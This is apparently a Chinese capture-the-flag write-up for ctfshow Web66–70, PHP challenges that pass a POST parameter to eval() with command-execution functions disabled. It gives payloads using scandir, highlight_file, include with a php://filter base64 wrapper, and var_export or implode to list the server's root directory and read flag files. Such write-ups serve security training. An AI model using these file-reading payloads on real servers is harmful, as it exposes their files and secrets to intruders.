ctfshow(66->70)--RCE/命令执行漏洞--禁用命令执行函数

Web66

源代码:

复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

代码审计:

POST传参c,eval进行代码执行。

思路:

由于题目过滤了命令执行函数,所以使用其他方法进行RCE。

先使用c=var_dump(scandir("."))查看当前目录下的文件,发现了flag.php
highlight_file('flag.php')查看发现没有flag.

于是使用c=var_dump(scandir("/"))查看根目录,发现flag.txt

EXP:

复制代码
c=highlight_file('/flag.php');

得到flag.

Web67

与上一题做法相同。

Web68

进入界面,回显为一个报错:

代码审计:

说明highlight_file()函数被禁用了。

思路:

用php伪协议查看文件内容。

EXP:

复制代码
c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=/flag.txt

base64解码得到flag.

Web69

回显与上一题相同。

思路

查看目录下的文件:

复制代码
c=var_dump(scandir("/"));
c=print_r(scandir("/"));

发现两个打印函数都被过滤了。

替换为var_export或implode即可。

EXP:

查看目录:

复制代码
c=var_export(scandir("/"));
c=echo implode("--",scandir("/"));

读取文件内容:

复制代码
c=include("/flag.txt");

Web 70

与上一题做法相同。

相关推荐
橘子海全栈攻城狮2 小时前
【源码+文档+调试讲解】基于SpringBoot + Vue的知识产权管理系统 041
java·vue.js·人工智能·spring boot·后端·安全·spring
sln_15504 小时前
2025强网杯tradRE简单wp
安全·逆向·ctf
偶尔贪玩的骑士6 小时前
Kioptrix Level 1渗透测试
linux·开发语言·网络安全·php
楠木s6 小时前
ctfshow pwn44
linux·服务器·网络·安全·网络攻击模型·二进制
wanhengidc8 小时前
服务器的安全性如何?
运维·服务器·安全·游戏·智能手机
这儿有一堆花9 小时前
一次渗透测试的全过程:从扫描到提权
web安全·网络安全·web
newxtc9 小时前
【猿辅导-注册安全分析报告-无验证方式导致安全隐患】
开发语言·selenium·安全·yolo·安全爆破
风语者日志10 小时前
CTFSHOW—WEB4
网络·安全·web安全·网络安全·ctf
gordon~910 小时前
Spring 的bean是安全的吗
java·安全·spring·bean
三坛海会大神55512 小时前
k8s(九)安全机制
安全·容器·kubernetes